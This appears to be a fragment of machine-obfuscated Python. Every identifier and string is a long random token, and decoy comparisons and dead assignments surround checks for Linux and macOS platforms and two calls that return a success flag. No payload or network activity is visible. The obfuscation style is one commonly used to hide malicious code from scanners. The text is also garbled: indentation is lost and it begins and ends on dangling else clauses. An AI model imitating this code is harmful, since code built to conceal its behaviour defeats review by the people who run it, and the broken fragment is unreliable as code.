VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf
else:
VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb
elif plat_type.startswith('linux'):
IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv = 'EdzXFPddTWjYqvrECsBuYRYlyJzvdXZGGwwgHzhMRamiJBWgcbbfooCYiiPSUKzdlfRIUvbODONCsHerJhSQTnUJuFZqdDcbMjLEZWTJkbHtyrGEudPoKLzoRdWuUDav'
WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw = 'rJBuuYUiYiBaEkJIOnbNVXKlmeULREQwQrtUgBCZPuMaRRJTnIntsVoyiXwOtbZIUWjYqmHUTwZaxxinXTjJckrvsnXMzYhAksghVEuznhbCtkMeEJLWrXkLpUtfdZSa'
vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR = 'trFZpiuODkCmOrwlFbOXtteYJONTIhhrqjxBOSnYlSvaLHeyncNVbnjuZaOGmuZtCJvlPvjWiQqCwGggxbyhAscdRNlsVUZVejEcImkjzmBWkEgKMAYcPngOlhaStLzQ'
YUpQZgDBIjevhbprAMJEhyvaSDzLPmJWPVafRlXjgMNzhaOoNtALUNDIxysALgjMmxBkEBKHgtSqfgMdqSklLpKwvqeKlwmorklabqvqdVMDrnFxfXSAZkXhzRudJkIn = 'wPYwqWfKcXIIARoCypcuWkCvdNuPwrIFJCYcOBmXLWRnGrGaTMIeeWdqDbwMUxZuamKLubRhxauJlfSxrlsAUCKuSaBVCmxLqtGgLUrDhNGUFOEhsvEbHwfFLpXbsZjF'
VxUAXUFyQoqufgYhaFwPrYGbpTjLVGfixtYcZMXbhUencngFHlXHteVJGyiaImfHzCdIAqzdxIURgqchvEqzsBbWDLpjugJGfBOrEKRspxCJlqwSdAUdkgHzZASdotkO = 'ooLwpizTQQQIYdtkOvCufyTkujzJJxsprvAJvkUTrEfCxSdSNJzTNfUIqWxgvMWNABpbrziJwVOHbKpitraEbsQwSvgvNwBTqrLbcrIAfDLQdjEcKTyLXoHRjeWZwWOq'
if IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv in WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw:
IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv = VxUAXUFyQoqufgYhaFwPrYGbpTjLVGfixtYcZMXbhUencngFHlXHteVJGyiaImfHzCdIAqzdxIURgqchvEqzsBbWDLpjugJGfBOrEKRspxCJlqwSdAUdkgHzZASdotkO
if WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw in vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR:
WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw = YUpQZgDBIjevhbprAMJEhyvaSDzLPmJWPVafRlXjgMNzhaOoNtALUNDIxysALgjMmxBkEBKHgtSqfgMdqSklLpKwvqeKlwmorklabqvqdVMDrnFxfXSAZkXhzRudJkIn
elif WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw in IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv:
vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR = WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw
if vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR in WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw:
WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw = VxUAXUFyQoqufgYhaFwPrYGbpTjLVGfixtYcZMXbhUencngFHlXHteVJGyiaImfHzCdIAqzdxIURgqchvEqzsBbWDLpjugJGfBOrEKRspxCJlqwSdAUdkgHzZASdotkO
success, NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW = mvZhXEFKFfgNpNuuGltXFxzkQSecRsRXzlhAQkZglUYprNzQuQHQSeOSyDFiFpSxmwrSdhfQrzzCnTBtWVKKPEWhDTpWhAURMjXmlPYrdZFeLxLfRaSKTXiBjplrpOiC()
qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo = 'DkWAiixkbZUdyEtqIPnKglKBwhoFJNvQuxrJWWNuDoCYmyGLoIyJdwVzxLwAJPcQBzShAVGKCxowJZJfzRQkPtwOkLGNwnEeUDFvbsgFUODlwTFHRsxLeDDntveRCEzy'
RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM = 'dRhifJKzhbKlTuXpCJmrErqaBoAIVbgqwQFthkDHNElAixTPudTnriSSBvUnMjlsIxqIfwncoxdUekWlkCQWRJGiVeWwZWTxfYeoDsiZxEeMryfpVpZCMlUIROmBBYIP'
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = 'zPCemKddDWOCPFcgKkbbxHKFIbzVcpnyYgZHjLMWctwXGHTmIhyqEHtGTYwYhJijJdQmiRaEcOVnRtaoboSFzsAQUhoXOeOLFiCWMZPMhOvwKEdpuEBnrjjyIfENFHhk'
sWcAPDAhMuinpAZrhIGxkyILWTAdKNIMEnnAiRiHwYYRtlrCzAsibRsbtIsnAKSIqXiFFjnhPSkmTFsQzidjuwlTkJdljzVCSsBxpfflDDoSBKyIMgjLUpgUNSzqkhTD = 'XuTQAhTvnZAbxaqQerXgzWUOaAhqqgufchOcLGViyknUZUNYTCnLIYLfgRkrounklIBPWINIqJYRjYfZRmvWEcYQbMHvVGvlLNwyQbLdBAAKcUgQwFKVhVdsqeHqriEs'
mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj = 'abQUJZhkpqXDBybZETEvllmLTHhUxfBegDARnztTJQxlzMBZrwpdQbJIBVvwhgMyakNLHzswjJfIypZQMitbDovbQiRkPdolLwocZKnWVVTMiSwBWhGzMMSDMbdLphEf'
hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp = 'QbfWJHLSkczBtPzlcgPeoEODqWsTDKhxCyXbKiktBfGyWdoLBJoFdKwzfjKOlCOWIOBZIAbUUuawjpjwvkvKcmfHGDvbfZIGnIPPMfeRGzccKVRqvbvazbUzIbDHuxtI'
if qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo != sWcAPDAhMuinpAZrhIGxkyILWTAdKNIMEnnAiRiHwYYRtlrCzAsibRsbtIsnAKSIqXiFFjnhPSkmTFsQzidjuwlTkJdljzVCSsBxpfflDDoSBKyIMgjLUpgUNSzqkhTD:
RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM = PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ
for hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp in sWcAPDAhMuinpAZrhIGxkyILWTAdKNIMEnnAiRiHwYYRtlrCzAsibRsbtIsnAKSIqXiFFjnhPSkmTFsQzidjuwlTkJdljzVCSsBxpfflDDoSBKyIMgjLUpgUNSzqkhTD:
if hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp != PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ:
RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM = RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM
else:
mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj = qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo
else:
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo
qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo = mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj
if PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ == qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo:
for hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp in qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo:
if hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp == PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ:
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo
else:
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj
elif plat_type.startswith('darwin'):
uiXMSqOwzwpMXWiUhBOXwzZErQUCZRtWFHIPBYkgGLBSeCDarApaHBsGqYYJDJEqXBNLcXbqfLBWxtGBnfweZgESlMpmdbWdtjLAfvrTZBOgZGjscMAHiXKqHlTBuGaU = 'xPNahBBlwJldTxKlQOMivnIFRxJexaEUbhqwPNZdIKTgJMTnmvvPkmAnpQfOiVBxGJBaJIflgCCEqCVrjUjZlyoMDOgFWkGvNcIePiVhDvpoBSJFqVQqxxNDmbNAxxlU'
jefaaudXKuPuRwuLgckBDShgmGdGKNtMOZhsxVYOupuUpGNQhfHrVKnJQHTdkOQmaAYpHxGDHhHvtBQTPuGLfUQWXYCYKfEkAgNVObCwoEPnkrxsseCaaNbuYETQWnKB = 'rKNaNqkicivvfAArFubkRjXcJEAOgIjgdmHqbwJIPkCGpLCRQsNjNVzwhqcseJjjfsnuNRmiSiqBFnZZCNoOuvICtdDlmwbgGnqDIAwyPjpbQnXEHLQTUFVtKWBhksQV'
if uiXMSqOwzwpMXWiUhBOXwzZErQUCZRtWFHIPBYkgGLBSeCDarApaHBsGqYYJDJEqXBNLcXbqfLBWxtGBnfweZgESlMpmdbWdtjLAfvrTZBOgZGjscMAHiXKqHlTBuGaU != jefaaudXKuPuRwuLgckBDShgmGdGKNtMOZhsxVYOupuUpGNQhfHrVKnJQHTdkOQmaAYpHxGDHhHvtBQTPuGLfUQWXYCYKfEkAgNVObCwoEPnkrxsseCaaNbuYETQWnKB:
GjiRApQzOEaMZZkaRRMbHNoveNJtgQKTNVYHvyinpvqTgRhIyGbudebXPNEJbNMqimIajjCjjPbFsYtrarkPqKNwyiUIwMQNYsCpPzomtrurMcUNiRuROfYGrPfAyJBv = 'kqHvmQCVfDuyUwbLdliFYLCJvfPijbpRAARstMiOMaTLtzrASGWWSELZGvccpcbrfJShBEfdFytIrogTaRSkipAjwCxjYgTMsGzoqXhibZEpVkRgWYdBzeXgBfcYPtNa'
UOMCYaGEGHljpEMZsIRGcOOGmFYfDYlhWdEmthpndnRPzomUQnkwXxsWUTyNsAEeDvtMdGrvRlndtiZRxvMAitVIVqCthaspdlnLOEgAYXjEdMJzEMgqehsOBQigJKQU = 'YOAmdvwnOGsSqxpSJVCpLXDYCYHdYePAMmbLdzbAdpEtyFOZUiabibzUMLzXbcmzeahEVJcSqMfXwJoAcyhazofXVhBsuAayXBRTJyZZKkKCtOCETsLqyEDhUcUyJwUp'
UOMCYaGEGHljpEMZsIRGcOOGmFYfDYlhWdEmthpndnRPzomUQnkwXxsWUTyNsAEeDvtMdGrvRlndtiZRxvMAitVIVqCthaspdlnLOEgAYXjEdMJzEMgqehsOBQigJKQU = GjiRApQzOEaMZZkaRRMbHNoveNJtgQKTNVYHvyinpvqTgRhIyGbudebXPNEJbNMqimIajjCjjPbFsYtrarkPqKNwyiUIwMQNYsCpPzomtrurMcUNiRuROfYGrPfAyJBv
success, NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW = mYdssxnsmlAfvrSjolIFLdNSWdICTyEYmQJbnrImdVXGTLxpgMTBCjxQsBPIPCwxgCZxnmFTFjwtxPqutRQqsngShUqEoaiDLTvGJtxHpdekdgRxYrThxYRXvvNUnaav()
LrWSsxLkFmRwxEuOriDRltONcXxJKdIpIesQyWKbKiECqYyCamnpqGAgvCeQnzrpDewbzkAxBJjWPhPdQudWMVSCqRHTCJvMZOIWOHKpHSsfcYOXHzhTwpSUCayXAqLX = 'mdIRMgjFGfxwXWkEEFIAFXpQLnMwNYHdZnrEFEDKhAseQfPMgyGmeqPIsfxHiMpAKdVreRICCygZoAYmearnIbSGxjAVRSQkyMcegQpvqPRbLNfZfpGaOcVdXHDpdLNT'
WxThgpZdrUxxOFPuORtfvhRrEyRGMKILWjVXlQGLEdLkkSLYfwgRIKHvYdNVZTyRFulSIJStMXdiNzOKpEidPTvEgXDZXCPopuObnGNNRVuPLkXdtstDUXUXKnldZynv = 'XBztUoSjSHQaSlNCwVJVlMPguJgoOPPbmjKGcCzUApqXFPGnqmURLgRBkImCszHOtMrhXhholtPAfASjDhqNWrHTPjBLPOfvwhRIWedfUfymLZxvsPZfjbtIpkaXmEME'
JYBIDEQmFBzfyexocCozUJRtslCDopFKRTzEENEKjrugsLeARuJgbJUVDTvQVgFOwjtWUCbbqkIRLLNeYmDcjCClMiQNlTVxSGVZLsvEOeILmMtxYKqEEUuZwehbJMGE = 'mAWokzAJVQqNRfeqRafwhGSqfdzpVxEHUHtZnjGkeiCsnZLzARpuczRVwHJCSrYkJTBeYAViBkpcSRVUjmjfQICSPZiTKzknKCocrHfaZyJstbgGlhsVxvKWAqzEdUdh'
if LrWSsxLkFmRwxEuOriDRltONcXxJKdIpIesQyWKbKiECqYyCamnpqGAgvCeQnzrpDewbzkAxBJjWPhPdQudWMVSCqRHTCJvMZOIWOHKpHSsfcYOXHzhTwpSUCayXAqLX == WxThgpZdrUxxOFPuORtfvhRrEyRGMKILWjVXlQGLEdLkkSLYfwgRIKHvYdNVZTyRFulSIJStMXdiNzOKpEidPTvEgXDZXCPopuObnGNNRVuPLkXdtstDUXUXKnldZynv:
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = 'jpxXkJeVedZYDJmZebgzHUnyPxVhXfWTbaeeduHNjWCqgEGZChIjgffeZKDvNKFvkggvfefGOQAYNBAAsvsvSwXNOoOXflwgRMRXjpyZLvZBBFAzMmzULqitQacugTIM'
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = LrWSsxLkFmRwxEuOriDRltONcXxJKdIpIesQyWKbKiECqYyCamnpqGAgvCeQnzrpDewbzkAxBJjWPhPdQudWMVSCqRHTCJvMZOIWOHKpHSsfcYOXHzhTwpSUCayXAqLX
else:
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = 'jpxXkJeVedZYDJmZebgzHUnyPxVhXfWTbaeeduHNjWCqgEGZChIjgffeZKDvNKFvkggvfefGOQAYNBAAsvsvSwXNOoOXflwgRMRXjpyZLvZBBFAzMmzULqitQacugTIM'
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = JYBIDEQmFBzfyexocCozUJRtslCDopFKRTzEENEKjrugsLeARuJgbJUVDTvQVgFOwjtWUCbbqkIRLLNeYmDcjCClMiQNlTVxSGVZLsvEOeILmMtxYKqEEUuZwehbJMGE
else:
zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY = 'mAJTzGqMDGVwJkHzBYRNEKFDkarNoGroWhrGVzRXwsbqzSKyBLXrQiCeKJxMJoIlFHNufYCEpgrAiWHCJMhmGBRatGBLqEAsfdEQzhycnZReTBKxgSYcDtGqrifYeSRP'
TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma = 'PiiisAnWHIJbZqABWSrKRGoFSJFhGHzAOglOAtomTTzJcfzNQYWViYOhCwxgCsyTXYbyGbmQqaCfizNuOLvuJgxJwDQOpFgJlgFYmnNHqEJYBjFfUygJZLZMFMVShyuD'
roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = 'DySZCCTJSYdOCsnJbBjInaqWPvVJlmgupTjxdwrHeDgcUwpFtHnixIVjTEKwgIaTwNERawxczbMInlssVvBqEvSpqrDcUPowfavgKQtVyTSgkgtjSUxapFHRxWbgGIHL'
vNWOCqhQuuoJLQraazflUbCmiFQQjODDMGIMePZDqrkcjbIahiBdLlTNOgqYFwXSVQiakFflXbvxcSKZEMrruOiMkaAiBWUlborWFVmTWLaknFEkyIHrQnXduzVGMcZU = 'oHDEjizoeesBbCyaFsSHMqbwBpUApQktOWRxCpRpQyMqgzuwbSArqfXpJgscfiaWOHcKIMMoToUMlWQCTVpPhVhmMECZcjVLYRKyKnFleVnKEgvJdoemVCeSeFfCYZJQ'
wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR = 'FlbUBUNzJVrugoQVfHCQAvwiSrcCVYqQAECLPXBbWGJskKddwbulovgPMRjfgdMmuwmmHkunwmMBKjpucXvwMIXNYUyFWYazdAbBBmKJhZkfLNRqQUXMaMsXvzGbUwJo'
zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG = 'nChgyQreCKFDtjmQRPUqTuSaCLgVtGPSXOgPMgvrENqETZisupJtsdzrrXtpzYIZSgVGVdeTXyGsnaEhphjDNcXyJfnbxlsGeqpXhhaNCcDjpfNHXqumGCnGwoVoBNii'
if zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY != vNWOCqhQuuoJLQraazflUbCmiFQQjODDMGIMePZDqrkcjbIahiBdLlTNOgqYFwXSVQiakFflXbvxcSKZEMrruOiMkaAiBWUlborWFVmTWLaknFEkyIHrQnXduzVGMcZU:
TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma = roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl
for zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG in vNWOCqhQuuoJLQraazflUbCmiFQQjODDMGIMePZDqrkcjbIahiBdLlTNOgqYFwXSVQiakFflXbvxcSKZEMrruOiMkaAiBWUlborWFVmTWLaknFEkyIHrQnXduzVGMcZU:
if zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG != roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl:
TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma = TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma
else:
wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR = zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY
else:
